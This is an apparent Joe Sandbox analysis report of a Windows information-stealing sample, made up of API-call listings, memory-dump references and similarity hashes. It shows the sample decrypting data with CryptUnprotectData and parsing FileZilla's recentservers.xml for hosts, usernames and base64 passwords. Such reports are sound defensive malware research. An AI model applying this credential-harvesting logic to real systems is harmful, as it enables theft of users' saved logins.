                                              • Opcode Fuzzy Hash: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                              • Instruction Fuzzy Hash: 1811DAF4204204BFDB00CF95DC89FA633AAAF89754F009568FA198B350D775F842DB60
                                              APIs
                                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,047E5155,00000000,00000000), ref: 047E9D56
                                              • LocalAlloc.KERNEL32(00000040,?,?,?,047E5155,00000000,?), ref: 047E9D68
                                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,047E5155,00000000,00000000), ref: 047E9D91
                                              • LocalFree.KERNEL32(?,?,?,?,047E5155,00000000,?), ref: 047E9DA6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: BinaryCryptLocalString$AllocFree
                                              • String ID:
                                              • API String ID: 4291131564-0
                                              • Opcode ID: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                              • Instruction ID: fc2e8471b855402ba550f5fb4b693d50326b67fa49daf5b4adf99f31f86b8b65
                                              • Opcode Fuzzy Hash: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                              • Instruction Fuzzy Hash: A711A4B4240208BFEB10CFA4CC95FAA77B5EB89704F208158FE159B390C776A901CB90
                                              APIs
                                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B84
                                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BA3
                                              • memcpy.MSVCRT(?,?,?), ref: 00409BC6
                                              • LocalFree.KERNEL32(?), ref: 00409BD3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                              • String ID:
                                              • API String ID: 3243516280-0
                                              • Opcode ID: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                              • Instruction ID: 8471c3d920f6d21a6ca128c50317bdd839bed9d1cf50ed0ddd6ab59e3c77a746
                                              • Opcode Fuzzy Hash: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                              • Instruction Fuzzy Hash: 46110CB8A00209EFDB04DF94D985AAE77B6FF89300F104569F915A7390D774AE10CF61
                                              APIs
                                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 047E9DEB
                                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 047E9E0A
                                              • memcpy.MSVCRT(?,?,?), ref: 047E9E2D
                                              • LocalFree.KERNEL32(?), ref: 047E9E3A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                              • String ID:
                                              • API String ID: 3243516280-0
                                              • Opcode ID: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                              • Instruction ID: 55628262827c43006df976d5bd95a5f10ea2ca22ef2d8d66a16e9365ebfea065
                                              • Opcode Fuzzy Hash: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                              • Instruction Fuzzy Hash: 5511F7B9A00209EFDB04CFA8D985AAEB7B9FF89700F104558E915A7350D730AA10CFA1
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,02BE9628,00000000,?,00420E10,00000000,?,00000000,00000000), ref: 00417A63
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,02BE9628,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00417A6A
                                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,02BE9628,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00417A7D
                                              • wsprintfA.USER32 ref: 00417AB7
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                              • String ID:
                                              • API String ID: 362916592-0
                                              • Opcode ID: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                              • Instruction ID: 8af700d3b0e32b47e9d6ddd9198ddf9a5cfc8e3ba9127fd648bfb7377b14e362
                                              • Opcode Fuzzy Hash: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                              • Instruction Fuzzy Hash: 461152B1A45228EFEB108B54DC45F9AB7B8FB05711F10439AE516932C0D7785A40CF55
                                              APIs
                                              • CoCreateInstance.COMBASE(0041E118,00000000,00000001,0041E108,00000000), ref: 00413758
                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 004137B0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ByteCharCreateInstanceMultiWide
                                              • String ID:
                                              • API String ID: 123533781-0
                                              • Opcode ID: 634e478c758f94cb0cd26d84ba9f3abb63f0756ecf75599706a634363863d21a
                                              • Instruction ID: 95f6a265596bdc049295610fa53daf8ef9ce5e7415083cbf30a8e52d2e28a0c3
                                              • Opcode Fuzzy Hash: 634e478c758f94cb0cd26d84ba9f3abb63f0756ecf75599706a634363863d21a
                                              • Instruction Fuzzy Hash: A941F474A40A28AFDB24DF58CC94BDAB7B5BB48306F4041D9A608A72D0E771AEC5CF50
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: .$GetProcAddress.$l
                                              • API String ID: 0-2784972518
                                              • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                              • Instruction ID: 8bdbb32b3192a6cdb07aee077edab421c03910ac1bb26cd6e8807b772ce68866
                                              • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                              • Instruction Fuzzy Hash: 7C316CB6900659DFEB10CF9AC884AAEBBF9FF48324F14414AD541A7310D7B1FA45CBA4
                                              APIs
                                              • SetUnhandledExceptionFilter.KERNEL32(Function_0001CEA8), ref: 0041CEEF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExceptionFilterUnhandled
                                              • String ID:
                                              • API String ID: 3192549508-0
                                              • Opcode ID: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                                              • Instruction ID: f83a9dfad8d9090bd4b69b445eb29f9fdcf7b9edf99be21673d757649d1b517e
                                              • Opcode Fuzzy Hash: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                                              • Instruction Fuzzy Hash: 3B9002753912104A471417755D496C52A905E9D6067624861B506C4054DB988044551A
                                              APIs
                                              • SetUnhandledExceptionFilter.KERNEL32(0041CEA8), ref: 047FD156
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExceptionFilterUnhandled
                                              • String ID:
                                              • API String ID: 3192549508-0
                                              • Opcode ID: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                                              • Instruction ID: f83a9dfad8d9090bd4b69b445eb29f9fdcf7b9edf99be21673d757649d1b517e
                                              • Opcode Fuzzy Hash: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                                              • Instruction Fuzzy Hash: 3B9002753912104A471417755D496C52A905E9D6067624861B506C4054DB988044551A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884483895.0000000002BB9000.00000040.00000020.00020000.00000000.sdmp, Offset: 02BB9000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2bb9000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                              • Instruction ID: 5999935776ac1a7375162e88b97dfe83d13b550a10cfe9ea4c624048fb68df98
                                              • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                              • Instruction Fuzzy Hash: 7E117C72340500AFD754DF55DC94EE673EAEF89330B1980A5EE08CB316D6BAE801CB60
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                              • Instruction ID: dd2fa72e818a2d997001c0662d8e29aea9da5ff033afcdcd2b0292702326df54
                                              • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                              • Instruction Fuzzy Hash: 5901D4726006508FDB21DF21C804BBA33A5FB89305F0546B4E506D7342E3B0B8418B80
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                              • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                              • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                              • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                              • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                              • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                              • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: free
                                              • String ID:
                                              • API String ID: 1294909896-0
                                              • Opcode ID: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                              • Instruction ID: ae07dfa2c5db2b09bd647b6ff56f38cd44ca69afce2f1d250138c760b3805629
                                              • Opcode Fuzzy Hash: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                              • Instruction Fuzzy Hash: 8C71F431454B40EBE7633B31DD09E4A7BA27F0430AF1049A4ABDF28734DAB27865AB51
                                              APIs
                                                • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                              • strtok_s.MSVCRT ref: 0041031B
                                              • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBA,00420DB7,00420DB6,00420DB3), ref: 00410362
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410369
                                              • StrStrA.SHLWAPI(00000000,<Host>), ref: 00410385
                                              • lstrlenA.KERNEL32(00000000), ref: 00410393
                                                • Part of subcall function 004188E0: malloc.MSVCRT ref: 004188E8
                                                • Part of subcall function 004188E0: strncpy.MSVCRT ref: 00418903
                                              • StrStrA.SHLWAPI(00000000,<Port>), ref: 004103CF
                                              • lstrlenA.KERNEL32(00000000), ref: 004103DD
                                              • StrStrA.SHLWAPI(00000000,<User>), ref: 00410419
                                              • lstrlenA.KERNEL32(00000000), ref: 00410427
                                              • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00410463
                                              • lstrlenA.KERNEL32(00000000), ref: 00410475
                                              • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410502
                                              • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041051A
                                              • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 00410532
                                              • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041054A
                                              • lstrcatA.KERNEL32(?,browser: FileZilla,?,?,00000000), ref: 00410562
                                              • lstrcatA.KERNEL32(?,profile: null,?,?,00000000), ref: 00410571
                                              • lstrcatA.KERNEL32(?,url: ,?,?,00000000), ref: 00410580
                                              • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410593
                                              • lstrcatA.KERNEL32(?,00421678,?,?,00000000), ref: 004105A2
                                              • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004105B5
                                              • lstrcatA.KERNEL32(?,0042167C,?,?,00000000), ref: 004105C4
                                              • lstrcatA.KERNEL32(?,login: ,?,?,00000000), ref: 004105D3
                                              • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004105E6
                                              • lstrcatA.KERNEL32(?,00421688,?,?,00000000), ref: 004105F5
                                              • lstrcatA.KERNEL32(?,password: ,?,?,00000000), ref: 00410604
                                              • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410617
                                              • lstrcatA.KERNEL32(?,00421698,?,?,00000000), ref: 00410626
                                              • lstrcatA.KERNEL32(?,0042169C,?,?,00000000), ref: 00410635
                                              • strtok_s.MSVCRT ref: 00410679
                                              • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 0041068E
                                              • memset.MSVCRT ref: 004106DD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$CloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                              • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$NA$NA$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                              • API String ID: 337689325-514892060
                                              • Opcode ID: a8872f9b9bb1cb9e478c25673be1377050816f1e4d9c1e82bbed77d0740d0bab
                                              • Instruction ID: d15eb70b6d553ab1cc94bc99ca27928082ec116ada4a7d19c18b432e65637ade
                                              • Opcode Fuzzy Hash: a8872f9b9bb1cb9e478c25673be1377050816f1e4d9c1e82bbed77d0740d0bab
                                              • Instruction Fuzzy Hash: 86D16D75A41208ABCB04FBF1DD86EEE7379FF14314F50441EF102A6091DE78AA96CB69
                                              APIs
                                              • lstrlen.KERNEL32(00424D90), ref: 047E4833
                                              • lstrlen.KERNEL32(00424E40), ref: 047E483E
                                              • lstrlen.KERNEL32(00424F08), ref: 047E4849
                                              • lstrlen.KERNEL32(00424FC0), ref: 047E4854
                                              • lstrlen.KERNEL32(00425068), ref: 047E485F
                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 047E486E
                                              • RtlAllocateHeap.NTDLL(00000000), ref: 047E4875
                                              • lstrlen.KERNEL32(00425110), ref: 047E4883
                                              • lstrlen.KERNEL32(004251B8), ref: 047E488E
                                              • lstrlen.KERNEL32(00425260), ref: 047E4899
                                              • lstrlen.KERNEL32(00425308), ref: 047E48A4
                                              • lstrlen.KERNEL32(004253B0), ref: 047E48AF
                                              • lstrlen.KERNEL32(00425458), ref: 047E48C3
                                              • lstrlen.KERNEL32(00425500), ref: 047E48CE
                                              • lstrlen.KERNEL32(004255A8), ref: 047E48D9
                                              • lstrlen.KERNEL32(00425650), ref: 047E48E4
                                              • lstrlen.KERNEL32(004256F8), ref: 047E48EF
                                              • lstrlen.KERNEL32(004257A0), ref: 047E4918
                                              • lstrlen.KERNEL32(00425848), ref: 047E4923
                                              • lstrlen.KERNEL32(00425910), ref: 047E492E
                                              • lstrlen.KERNEL32(004259B8), ref: 047E4939
                                              • lstrlen.KERNEL32(00425A60), ref: 047E4944
                                              • strlen.MSVCRT ref: 047E4957
                                              • lstrlen.KERNEL32(00425B08), ref: 047E497F
                                              • lstrlen.KERNEL32(00425BB0), ref: 047E498A
                                              • lstrlen.KERNEL32(00425C58), ref: 047E4995
                                              • lstrlen.KERNEL32(00425D00), ref: 047E49A0
                                              • lstrlen.KERNEL32(00425DA8), ref: 047E49AB
                                              • lstrlen.KERNEL32(00425E50), ref: 047E49BB
                                              • lstrlen.KERNEL32(00425EF8), ref: 047E49C6
                                              • lstrlen.KERNEL32(00425FA0), ref: 047E49D1
                                              • lstrlen.KERNEL32(00426048), ref: 047E49DC
                                              • lstrlen.KERNEL32(004260F0), ref: 047E49E7
                                              • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 047E4A03
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                              • String ID:
                                              • API String ID: 2127927946-0
                                              • Opcode ID: 7ec8420cb7fbb92e3b9dac634e6e561209ac50f0bb2ad10c25cf711909d82004
                                              • Instruction ID: e4df92c583a2bfcc687e99fdbf0200f1e0702f48dfeccc13790a93c4b4e0037a
                                              • Opcode Fuzzy Hash: 7ec8420cb7fbb92e3b9dac634e6e561209ac50f0bb2ad10c25cf711909d82004
                                              • Instruction Fuzzy Hash: 1C41B979740624EBC7189FE6FC8EB987F61AB4C712BA0C062F90299190CBF5D5019B3D
                                              APIs
                                              • GetProcAddress.KERNEL32(0064A8B0,0064A204), ref: 047F9B08
                                              • GetProcAddress.KERNEL32(0064A8B0,0064A5C8), ref: 047F9B21
                                              • GetProcAddress.KERNEL32(0064A8B0,0064A644), ref: 047F9B39
                                              • GetProcAddress.KERNEL32(0064A8B0,0064A264), ref: 047F9B51
                                              • GetProcAddress.KERNEL32(0064A8B0,0064A250), ref: 047F9B6A
                                              • GetProcAddress.KERNEL32(0064A8B0,0064A2F8), ref: 047F9B82
                                              • GetProcAddress.KERNEL32(0064A8B0,0064A4D4), ref: 047F9B9A
                                              • GetProcAddress.KERNEL32(0064A8B0,0064A33C), ref: 047F9BB3
                                              • GetProcAddress.KERNEL32(0064A8B0,0064A5A0), ref: 047F9BCB
                                              • GetProcAddress.KERNEL32(0064A8B0,0064A548), ref: 047F9BE3
                                              • GetProcAddress.KERNEL32(0064A8B0,0064A3BC), ref: 047F9BFC
                                              • GetProcAddress.KERNEL32(0064A8B0,0064A2E8), ref: 047F9C14
                                              • GetProcAddress.KERNEL32(0064A8B0,0064A60C), ref: 047F9C2C
                                              • GetProcAddress.KERNEL32(0064A8B0,0064A0B0), ref: 047F9C45
                                              • GetProcAddress.KERNEL32(0064A8B0,0064A598), ref: 047F9C5D
                                              • GetProcAddress.KERNEL32(0064A8B0,0064A224), ref: 047F9C75
                                              • GetProcAddress.KERNEL32(0064A8B0,0064A418), ref: 047F9C8E
                                              • GetProcAddress.KERNEL32(0064A8B0,0064A634), ref: 047F9CA6
                                              • GetProcAddress.KERNEL32(0064A8B0,0064A0BC), ref: 047F9CBE
                                              • GetProcAddress.KERNEL32(0064A8B0,0064A12C), ref: 047F9CD7
                                              • GetProcAddress.KERNEL32(0064A8B0,0064A2B0), ref: 047F9CEF
                                              • LoadLibraryA.KERNEL32(0064A550,?,047F6C67), ref: 047F9D01
                                              • LoadLibraryA.KERNEL32(0064A17C,?,047F6C67), ref: 047F9D12
                                              • LoadLibraryA.KERNEL32(0064A104,?,047F6C67), ref: 047F9D24
                                              • LoadLibraryA.KERNEL32(0064A1DC,?,047F6C67), ref: 047F9D36
                                              • LoadLibraryA.KERNEL32(0064A328,?,047F6C67), ref: 047F9D47
                                              • GetProcAddress.KERNEL32(0064A6D4,0064A4AC), ref: 047F9D69
                                              • GetProcAddress.KERNEL32(0064A7F4,0064A424), ref: 047F9D8A
                                              • GetProcAddress.KERNEL32(0064A7F4,0064A1CC), ref: 047F9DA2
                                              • GetProcAddress.KERNEL32(0064A8E4,0064A394), ref: 047F9DC4
                                              • GetProcAddress.KERNEL32(0064A7A8,0064A128), ref: 047F9DE5
                                              • GetProcAddress.KERNEL32(0064A7D8,0064A414), ref: 047F9E06
                                              • GetProcAddress.KERNEL32(0064A7D8,00420724), ref: 047F9E1D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AddressProc$LibraryLoad
                                              • String ID:
                                              • API String ID: 2238633743-0
                                              • Opcode ID: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                              • Instruction ID: 5584e469b3a0173b5080b3c37e33ce8d4538d5bda6e16315af4ea3b932e6648c
                                              • Opcode Fuzzy Hash: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                              • Instruction Fuzzy Hash: 9FA14DBD5C0240BFE354EFE8ED88A963BFBF74E301714661AE605C3264D639A441DB52
                                              APIs
                                                • Part of subcall function 047FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 047FA9EF
                                                • Part of subcall function 047F9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 047F9072
                                                • Part of subcall function 047FAB87: lstrcpy.KERNEL32(00000000,?), ref: 047FABD9
                                                • Part of subcall function 047FAB87: lstrcat.KERNEL32(00000000), ref: 047FABE9
                                                • Part of subcall function 047FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 047FAB6C
                                                • Part of subcall function 047FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FAC,00420E17), ref: 047FAC2C
